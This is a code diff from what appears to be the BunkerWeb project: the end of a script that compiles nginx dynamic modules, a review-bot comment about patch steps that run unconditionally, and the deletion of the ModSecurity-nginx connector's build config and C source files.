echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/ModSecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd make -j $NTASK modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd mv auto/configure ./
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/modsecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd make -j $NTASK modules
do_and_check_cmd mkdir /usr/share/bunkerweb/modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
# Dependencies are installed
echo " Dependencies for BunkerWeb successfully compiled and installed !"
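Review bot: The `patch` calls moved into this script (the ModSecurity `configure.ac` patch in the first hunk, then ipmatcher, mmdb, lua-ffi-zlib and the four ModSecurity-nginx patches) run unconditionally on every invocation, whereas the deleted clone.sh only applied them on a fresh clone via its `dopatch` guard. If this install script is ever re-run against an already-patched `/tmp/bunkerweb/deps/src` tree, `patch` will see reversed hunks and fail through `do_and_check_cmd`; whether the tree is always fresh cannot be told from this page. A guard such as `patch -R -s -f --dry-run FILE PATCH >/dev/null && continue-style skip`, or a one-line comment stating that `/tmp/bunkerweb/deps/src` must be a fresh subtree export, would make the assumption explicit. The `cd ... && ./build.sh > /dev/null 2>&1` line in the same hunk still discards both output and exit status, unlike every surrounding step that goes through `do_and_check_cmd`.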


@ -1,192 +0,0 @@
# vim: filetype=sh
# If $NGX_IGNORE_RPATH is set to "YES", we will ignore explicit
# library path specification on resulting binary, allowing libmodsecurity.so
# to be relocated across configured library pathes (adjust /etc/ld.so.conf
# or set $LD_LIBRARY_PATH environment variable to manage them)
#
# $YAJL_LIB variable may need to be populated in case of non-standard
# path of libyajl.so's installation
ngx_feature_name=
ngx_feature_run=no
ngx_feature_incs="#include <modsecurity/modsecurity.h>"
ngx_feature_libs="-lmodsecurity"
ngx_feature_test='printf("hello");'
ngx_modsecurity_opt_I=
ngx_modsecurity_opt_L=
YAJL_EXTRA=
if test -n "$YAJL_LIB"; then
YAJL_EXTRA="-L$YAJL_LIB -lyajl"
fi
# If $MODSECURITY_INC is specified, lets use it. Otherwise lets try
# the default paths
#
if [ -n "$MODSECURITY_INC" -o -n "$MODSECURITY_LIB" ]; then
# explicitly set ModSecurity lib path
ngx_feature="ModSecurity library in \"$MODSECURITY_LIB\" and \"$MODSECURITY_INC\" (specified by the MODSECURITY_LIB and MODSECURITY_INC env)"
ngx_feature_path="$MODSECURITY_INC"
ngx_modsecurity_opt_I="-I$MODSECURITY_INC"
ngx_modsecurity_opt_L="-L$MODSECURITY_LIB $YAJL_EXTRA"
if [ $NGX_RPATH = YES ]; then
ngx_feature_libs="-R$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
ngx_feature_libs="-Wl,-rpath,$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
else
ngx_feature_libs="-L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
fi
. auto/feature
if [ $ngx_found = no ]; then
cat << END
$0: error: ngx_http_modsecurity_module requires the ModSecurity library and MODSECURITY_LIB is defined as "$MODSECURITY_LIB" and MODSECURITY_INC (path for modsecurity.h) "$MODSECURITY_INC", but we cannot find ModSecurity there.
END
exit 1
fi
else
# auto-discovery
ngx_feature="ModSecurity library"
ngx_feature_libs="-lmodsecurity"
. auto/feature
if [ $ngx_found = no ]; then
ngx_feature="ModSecurity library in /usr/local/modsecurity"
ngx_feature_path="/usr/local/modsecurity/include"
if [ $NGX_RPATH = YES ]; then
ngx_feature_libs="-R/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
ngx_feature_libs="-Wl,-rpath,/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
else
ngx_feature_libs="-L/usr/local/modsecurity/lib -lmodsecurity"
fi
. auto/feature
fi
fi
if [ $ngx_found = no ]; then
cat << END
$0: error: ngx_http_modsecurity_module requires the ModSecurity library.
END
exit 1
fi
ngx_addon_name=ngx_http_modsecurity_module
# We must place ngx_http_modsecurity_module after ngx_http_gzip_filter_module
# in load order list to be able to read response body before it gets compressed
# (for filter modules later initialization means earlier execution).
#
# Nginx implements load ordering only for dynamic modules and only a BEFORE part
# of "ngx_module_order". So we list all of the modules that come after
# ngx_http_gzip_filter_module as a BEFORE dependency for
# ngx_http_modsecurity_module.
#
# For static compilation HTTP_FILTER_MODULES will be patched later.
modsecurity_dependency="ngx_http_postpone_filter_module \
ngx_http_ssi_filter_module \
ngx_http_charset_filter_module \
ngx_http_xslt_filter_module \
ngx_http_image_filter_module \
ngx_http_sub_filter_module \
ngx_http_addition_filter_module \
ngx_http_gunzip_filter_module \
ngx_http_userid_filter_module \
ngx_http_headers_filter_module \
ngx_http_copy_filter_module"
if test -n "$ngx_module_link"; then
ngx_module_type=HTTP_FILTER
ngx_module_name="$ngx_addon_name"
ngx_module_srcs="$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
"
ngx_module_deps="$ngx_addon_dir/src/ddebug.h \
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
"
ngx_module_libs="$ngx_feature_libs"
ngx_module_incs="$ngx_feature_path"
ngx_module_order="ngx_http_chunked_filter_module \
ngx_http_v2_filter_module \
ngx_http_range_header_filter_module \
ngx_http_gzip_filter_module \
$ngx_module_name \
$modsecurity_dependency";
. auto/module
else
CFLAGS="$ngx_modsecurity_opt_I $CFLAGS"
NGX_LD_OPT="$ngx_modsecurity_opt_L $NGX_LD_OPT"
CORE_INCS="$CORE_INCS $ngx_feature_path"
CORE_LIBS="$CORE_LIBS $ngx_feature_libs"
HTTP_FILTER_MODULES="$HTTP_FILTER_MODULES ngx_http_modsecurity_module"
NGX_ADDON_SRCS="\
$NGX_ADDON_SRCS \
$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
"
NGX_ADDON_DEPS="\
$NGX_ADDON_DEPS \
$ngx_addon_dir/src/ddebug.h \
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
"
fi
#
# Nginx does not provide reliable way to introduce our module into required
# place in static ($ngx_module_link=ADDON) compilation mode, so we must
# explicitly update module "ordering rules".
#
if [ "$ngx_module_link" != DYNAMIC ] ; then
# Reposition modsecurity module to satisfy $modsecurity_dependency
# (this mimics dependency resolution made by ngx_add_module() function
# though less optimal in terms of computational complexity).
modules=
found=
for module in $HTTP_FILTER_MODULES; do
# skip our module name from the original list
if [ "$module" = "$ngx_addon_name" ]; then
continue
fi
if [ -z "${found}" ]; then
for item in $modsecurity_dependency; do
if [ "$module" = "$item" ]; then
modules="${modules} $ngx_addon_name"
found=1
break
fi
done
fi
modules="${modules} $module"
done
if [ -z "${found}" ]; then
# This must never happen since ngx_http_copy_filter_module must be in HTTP_FILTER_MODULES
# and we stated dependency on it in $modsecurity_dependency
echo "$0: error: cannot reposition modsecurity module in HTTP_FILTER_MODULES list"
exit 1
fi
HTTP_FILTER_MODULES="${modules}"
fi


@ -1,228 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
void
ngx_http_modsecurity_request_read(ngx_http_request_t *r)
{
ngx_http_modsecurity_ctx_t *ctx;
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
#if defined(nginx_version) && nginx_version >= 8011
r->main->count--;
#endif
if (ctx->waiting_more_body)
{
ctx->waiting_more_body = 0;
r->write_event_handler = ngx_http_core_run_phases;
ngx_http_core_run_phases(r);
}
}
ngx_int_t
ngx_http_modsecurity_access_handler(ngx_http_request_t *r)
{
#if 1
ngx_pool_t *old_pool;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
dd("catching a new _access_ phase handler");
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
if (mcf == NULL || mcf->enable != 1)
{
dd("ModSecurity not enabled... returning");
return NGX_DECLINED;
}
/*
* FIXME:
* In order to perform some tests, let's accept everything.
*
if (r->method != NGX_HTTP_GET &&
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
dd("ModSecurity is not ready to deal with anything different from " \
"POST, GET or HEAD");
return NGX_DECLINED;
}
*/
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
dd("recovering ctx: %p", ctx);
if (ctx == NULL)
{
dd("ctx is null; Nothing we can do, returning an error.");
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
if (ctx->intervention_triggered) {
return NGX_DECLINED;
}
if (ctx->waiting_more_body == 1)
{
dd("waiting for more data before proceed. / count: %d",
r->main->count);
return NGX_DONE;
}
if (ctx->body_requested == 0)
{
ngx_int_t rc = NGX_OK;
ctx->body_requested = 1;
dd("asking for the request body, if any. Count: %d",
r->main->count);
/**
* TODO: Check if there is any benefit to use request_body_in_single_buf set to 1.
*
* saw some module using this request_body_in_single_buf
* but not sure what exactly it does, same for the others options below.
*
* r->request_body_in_single_buf = 1;
*/
r->request_body_in_single_buf = 1;
r->request_body_in_persistent_file = 1;
if (!r->request_body_in_file_only) {
// If the above condition fails, then the flag below will have been
// set correctly elsewhere. We need to set the flag here for other
// conditions (client_body_in_file_only not used but
// client_body_buffer_size is)
r->request_body_in_clean_file = 1;
}
rc = ngx_http_read_client_request_body(r,
ngx_http_modsecurity_request_read);
if (rc == NGX_ERROR || rc >= NGX_HTTP_SPECIAL_RESPONSE) {
#if (nginx_version < 1002006) || \
(nginx_version >= 1003000 && nginx_version < 1003009)
r->main->count--;
#endif
return rc;
}
if (rc == NGX_AGAIN)
{
dd("nginx is asking us to wait for more data.");
ctx->waiting_more_body = 1;
return NGX_DONE;
}
}
if (ctx->waiting_more_body == 0)
{
int ret = 0;
int already_inspected = 0;
dd("request body is ready to be processed");
r->write_event_handler = ngx_http_core_run_phases;
ngx_chain_t *chain = r->request_body->bufs;
/**
* TODO: Speed up the analysis by sending chunk while they arrive.
*
* Notice that we are waiting for the full request body to
* start to process it, it may not be necessary. We may send
* the chunks to ModSecurity while nginx keep calling this
* function.
*/
if (r->request_body->temp_file != NULL) {
ngx_str_t file_path = r->request_body->temp_file->file.name;
const char *file_name = ngx_str_to_char(file_path, r->pool);
if (file_name == (char*)-1) {
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
/*
* Request body was saved to a file, probably we don't have a
* copy of it in memory.
*/
dd("request body inspection: file -- %s", file_name);
msc_request_body_from_file(ctx->modsec_transaction, file_name);
already_inspected = 1;
} else {
dd("inspection request body in memory.");
}
while (chain && !already_inspected)
{
u_char *data = chain->buf->pos;
msc_append_request_body(ctx->modsec_transaction, data,
chain->buf->last - data);
if (chain->buf->last_buf) {
break;
}
chain = chain->next;
/* XXX: chains are processed one-by-one, maybe worth to pass all chains and then call intervention() ? */
/**
* ModSecurity may perform stream inspection on this buffer,
* it may ask for a intervention in consequence of that.
*
*/
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
if (ret > 0) {
return ret;
}
}
/**
* At this point, all the request body was sent to ModSecurity
* and we want to make sure that all the request body inspection
* happened; consequently we have to check if ModSecurity have
* returned any kind of intervention.
*/
/* XXX: once more -- is body can be modified ? content-length need to be adjusted ? */
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
msc_process_request_body(ctx->modsec_transaction);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
if (r->error_page) {
return NGX_DECLINED;
}
if (ret > 0) {
return ret;
}
}
dd("Nothing to add on the body inspection, reclaiming a NGX_DECLINED");
#endif
return NGX_DECLINED;
}


@ -1,173 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
#define _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
#include <nginx.h>
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
#include <modsecurity/modsecurity.h>
#include <modsecurity/transaction.h>
/* #define MSC_USE_RULES_SET 1 */
#if defined(MODSECURITY_CHECK_VERSION)
#if MODSECURITY_VERSION_NUM >= 304010
#define MSC_USE_RULES_SET 1
#endif
#endif
#if defined(MSC_USE_RULES_SET)
#include <modsecurity/rules_set.h>
#else
#include <modsecurity/rules.h>
#endif
/**
* TAG_NUM:
*
* Alpha - 001
* Beta - 002
* Dev - 010
* Rc1 - 051
* Rc2 - 052
* ... - ...
* Release- 100
*
*/
#define MODSECURITY_NGINX_MAJOR "1"
#define MODSECURITY_NGINX_MINOR "0"
#define MODSECURITY_NGINX_PATCHLEVEL "3"
#define MODSECURITY_NGINX_TAG ""
#define MODSECURITY_NGINX_TAG_NUM "100"
#define MODSECURITY_NGINX_VERSION MODSECURITY_NGINX_MAJOR "." \
MODSECURITY_NGINX_MINOR "." MODSECURITY_NGINX_PATCHLEVEL \
MODSECURITY_NGINX_TAG
#define MODSECURITY_NGINX_VERSION_NUM MODSECURITY_NGINX_MAJOR \
MODSECURITY_NGINX_MINOR MODSECURITY_NGINX_PATCHLEVEL \
MODSECURITY_NGINX_TAG_NUM
#define MODSECURITY_NGINX_WHOAMI "ModSecurity-nginx v" \
MODSECURITY_NGINX_VERSION
typedef struct {
ngx_str_t name;
ngx_str_t value;
} ngx_http_modsecurity_header_t;
typedef struct {
ngx_http_request_t *r;
Transaction *modsec_transaction;
ModSecurityIntervention *delayed_intervention;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
/*
* Should be filled with the headers that were sent to ModSecurity.
*
* The idea is to compare this set of headers with the headers that were
* sent to the client. This check was placed because we don't have control
* over other modules, thus, we may partially inspect the headers.
*
*/
ngx_array_t *sanity_headers_out;
#endif
unsigned waiting_more_body:1;
unsigned body_requested:1;
unsigned processed:1;
unsigned logged:1;
unsigned intervention_triggered:1;
} ngx_http_modsecurity_ctx_t;
typedef struct {
void *pool;
ModSecurity *modsec;
ngx_uint_t rules_inline;
ngx_uint_t rules_file;
ngx_uint_t rules_remote;
} ngx_http_modsecurity_main_conf_t;
typedef struct {
void *pool;
/* RulesSet or Rules */
void *rules_set;
ngx_flag_t enable;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_flag_t sanity_checks_enabled;
#endif
ngx_http_complex_value_t *transaction_id;
} ngx_http_modsecurity_conf_t;
typedef ngx_int_t (*ngx_http_modsecurity_resolv_header_pt)(ngx_http_request_t *r, ngx_str_t name, off_t offset);
typedef struct {
ngx_str_t name;
ngx_uint_t offset;
ngx_http_modsecurity_resolv_header_pt resolver;
} ngx_http_modsecurity_header_out_t;
extern ngx_module_t ngx_http_modsecurity_module;
/* ngx_http_modsecurity_module.c */
int ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log);
ngx_http_modsecurity_ctx_t *ngx_http_modsecurity_create_ctx(ngx_http_request_t *r);
char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p);
#if (NGX_PCRE2)
#define ngx_http_modsecurity_pcre_malloc_init(x) NULL
#define ngx_http_modsecurity_pcre_malloc_done(x) (void)x
#else
ngx_pool_t *ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool);
void ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool);
#endif
/* ngx_http_modsecurity_body_filter.c */
ngx_int_t ngx_http_modsecurity_body_filter_init(void);
ngx_int_t ngx_http_modsecurity_body_filter(ngx_http_request_t *r, ngx_chain_t *in);
/* ngx_http_modsecurity_header_filter.c */
ngx_int_t ngx_http_modsecurity_header_filter_init(void);
ngx_int_t ngx_http_modsecurity_header_filter(ngx_http_request_t *r);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
int ngx_http_modsecurity_store_ctx_header(ngx_http_request_t *r, ngx_str_t *name, ngx_str_t *value);
#endif
/* ngx_http_modsecurity_log.c */
void ngx_http_modsecurity_log(void *log, const void* data);
ngx_int_t ngx_http_modsecurity_log_handler(ngx_http_request_t *r);
/* ngx_http_modsecurity_access.c */
ngx_int_t ngx_http_modsecurity_access_handler(ngx_http_request_t *r);
/* ngx_http_modsecurity_rewrite.c */
ngx_int_t ngx_http_modsecurity_rewrite_handler(ngx_http_request_t *r);
#endif /* _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_ */


@ -1,81 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
void
ngx_http_modsecurity_log(void *log, const void* data)
{
const char *msg;
if (log == NULL) {
return;
}
msg = (const char *) data;
ngx_log_error(NGX_LOG_WARN, (ngx_log_t *)log, 0, "%s", msg);
}
ngx_int_t
ngx_http_modsecurity_log_handler(ngx_http_request_t *r)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
dd("catching a new _log_ phase handler");
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
if (mcf == NULL || mcf->enable != 1)
{
dd("ModSecurity not enabled... returning");
return NGX_OK;
}
/*
if (r->method != NGX_HTTP_GET &&
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
dd("ModSecurity is not ready to deal with anything different from " \
"POST, GET or HEAD");
return NGX_OK;
}
*/
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
dd("recovering ctx: %p", ctx);
if (ctx == NULL) {
dd("something really bad happened here. returning NGX_ERROR");
return NGX_ERROR;
}
if (ctx->logged) {
dd("already logged earlier");
return NGX_OK;
}
dd("calling msc_process_logging for %p", ctx);
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
msc_process_logging(ctx->modsec_transaction);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
return NGX_OK;
}


@ -1,793 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
#include "stdio.h"
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
static ngx_int_t ngx_http_modsecurity_init(ngx_conf_t *cf);
static void *ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf);
static char *ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf);
static void *ngx_http_modsecurity_create_conf(ngx_conf_t *cf);
static char *ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child);
static void ngx_http_modsecurity_cleanup_instance(void *data);
static void ngx_http_modsecurity_cleanup_rules(void *data);
/*
* PCRE malloc/free workaround, based on
* https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_pcrefix.c
*/
#if !(NGX_PCRE2)
static void *(*old_pcre_malloc)(size_t);
static void (*old_pcre_free)(void *ptr);
static ngx_pool_t *ngx_http_modsec_pcre_pool = NULL;
static void *
ngx_http_modsec_pcre_malloc(size_t size)
{
if (ngx_http_modsec_pcre_pool) {
return ngx_palloc(ngx_http_modsec_pcre_pool, size);
}
fprintf(stderr, "error: modsec pcre malloc failed due to empty pcre pool");
return NULL;
}
static void
ngx_http_modsec_pcre_free(void *ptr)
{
if (ngx_http_modsec_pcre_pool) {
ngx_pfree(ngx_http_modsec_pcre_pool, ptr);
return;
}
#if 0
/* this may happen when called from cleanup handlers */
fprintf(stderr, "error: modsec pcre free failed due to empty pcre pool");
#endif
return;
}
ngx_pool_t *
ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool)
{
ngx_pool_t *old_pool;
if (pcre_malloc != ngx_http_modsec_pcre_malloc) {
ngx_http_modsec_pcre_pool = pool;
old_pcre_malloc = pcre_malloc;
old_pcre_free = pcre_free;
pcre_malloc = ngx_http_modsec_pcre_malloc;
pcre_free = ngx_http_modsec_pcre_free;
return NULL;
}
old_pool = ngx_http_modsec_pcre_pool;
ngx_http_modsec_pcre_pool = pool;
return old_pool;
}
void
ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool)
{
ngx_http_modsec_pcre_pool = old_pool;
if (old_pool == NULL) {
pcre_malloc = old_pcre_malloc;
pcre_free = old_pcre_free;
}
}
#endif
/*
* ngx_string's are not null-terminated in common case, so we need to convert
* them into null-terminated ones before passing to ModSecurity
*/
ngx_inline char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p)
{
char *str = NULL;
if (a.len == 0) {
return NULL;
}
str = ngx_pnalloc(p, a.len+1);
if (str == NULL) {
dd("failed to allocate memory to convert space ngx_string to C string");
/* We already returned NULL for an empty string, so return -1 here to indicate allocation error */
return (char *)-1;
}
ngx_memcpy(str, a.data, a.len);
str[a.len] = '\0';
return str;
}
ngx_inline int
ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log)
{
char *log = NULL;
ModSecurityIntervention intervention;
intervention.status = 200;
intervention.url = NULL;
intervention.log = NULL;
intervention.disruptive = 0;
ngx_http_modsecurity_ctx_t *ctx = NULL;
dd("processing intervention");
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
if (ctx == NULL)
{
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
if (msc_intervention(transaction, &intervention) == 0) {
dd("nothing to do");
return 0;
}
log = intervention.log;
if (intervention.log == NULL) {
log = "(no log message was specified)";
}
ngx_log_error(NGX_LOG_ERR, (ngx_log_t *)r->connection->log, 0, "%s", log);
if (intervention.log != NULL) {
free(intervention.log);
}
if (intervention.url != NULL)
{
dd("intervention -- redirecting to: %s with status code: %d", intervention.url, intervention.status);
if (r->header_sent)
{
dd("Headers are already sent. Cannot perform the redirection at this point.");
return -1;
}
/**
* Not sure if it sane to do this indepent of the phase
* but, here we go...
*
* This code cames from: http/ngx_http_special_response.c
* function: ngx_http_send_error_page
* src/http/ngx_http_core_module.c
* From src/http/ngx_http_core_module.c (line 1910) i learnt
* that location->hash should be set to 1.
*
*/
ngx_http_clear_location(r);
ngx_str_t a = ngx_string("");
a.data = (unsigned char *)intervention.url;
a.len = strlen(intervention.url);
ngx_table_elt_t *location = NULL;
location = ngx_list_push(&r->headers_out.headers);
ngx_str_set(&location->key, "Location");
location->value = a;
r->headers_out.location = location;
r->headers_out.location->hash = 1;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_http_modsecurity_store_ctx_header(r, &location->key, &location->value);
#endif
return intervention.status;
}
if (intervention.status != 200)
{
/**
* FIXME: this will bring proper response code to audit log in case
* when e.g. error_page redirect was triggered, but there still won't be another
* required pieces like response headers etc.
*
*/
msc_update_status_code(ctx->modsec_transaction, intervention.status);
if (early_log) {
dd("intervention -- calling log handler manually with code: %d", intervention.status);
ngx_http_modsecurity_log_handler(r);
ctx->logged = 1;
}
if (r->header_sent)
{
dd("Headers are already sent. Cannot perform the redirection at this point.");
return -1;
}
dd("intervention -- returning code: %d", intervention.status);
return intervention.status;
}
return 0;
}
void
ngx_http_modsecurity_cleanup(void *data)
{
ngx_http_modsecurity_ctx_t *ctx;
ctx = (ngx_http_modsecurity_ctx_t *) data;
msc_transaction_cleanup(ctx->modsec_transaction);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
/*
* Purge stored context headers. Memory allocated for individual stored header
* name/value pair will be freed automatically when r->pool is destroyed.
*/
ngx_array_destroy(ctx->sanity_headers_out);
#endif
}
ngx_inline ngx_http_modsecurity_ctx_t *
ngx_http_modsecurity_create_ctx(ngx_http_request_t *r)
{
ngx_str_t s;
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
ngx_http_modsecurity_main_conf_t *mmcf;
ctx = ngx_pcalloc(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
if (ctx == NULL)
{
dd("failed to allocate memory for the context.");
return NULL;
}
mmcf = ngx_http_get_module_main_conf(r, ngx_http_modsecurity_module);
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
dd("creating transaction with the following rules: '%p' -- ms: '%p'", mcf->rules_set, mmcf->modsec);
if (mcf->transaction_id) {
if (ngx_http_complex_value(r, mcf->transaction_id, &s) != NGX_OK) {
return NGX_CONF_ERROR;
}
ctx->modsec_transaction = msc_new_transaction_with_id(mmcf->modsec, mcf->rules_set, (char *) s.data, r->connection->log);
} else {
ctx->modsec_transaction = msc_new_transaction(mmcf->modsec, mcf->rules_set, r->connection->log);
}
dd("transaction created");
ngx_http_set_ctx(r, ctx, ngx_http_modsecurity_module);
cln = ngx_pool_cleanup_add(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
if (cln == NULL)
{
dd("failed to create the ModSecurity context cleanup");
return NGX_CONF_ERROR;
}
